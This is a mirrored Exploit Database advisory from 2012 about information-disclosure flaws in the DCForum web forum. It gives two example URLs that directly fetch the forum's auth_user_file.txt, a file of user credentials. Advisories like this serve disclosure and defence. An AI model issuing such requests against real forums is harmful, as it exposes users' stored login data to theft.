DCForum – ‘auth_user_file.txt’ File Multiple Information Disclosure Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： r45c4l
  日期： 2012-11-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38007/

• source: https://www.securityfocus.com/bid/56383/info
  
  DCForum is prone to multiple information-disclosure vulnerabilities.
  
  Exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks. 
  
  http://www.example.com/cgi-bin/User_info/auth_user_file.txt
  http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt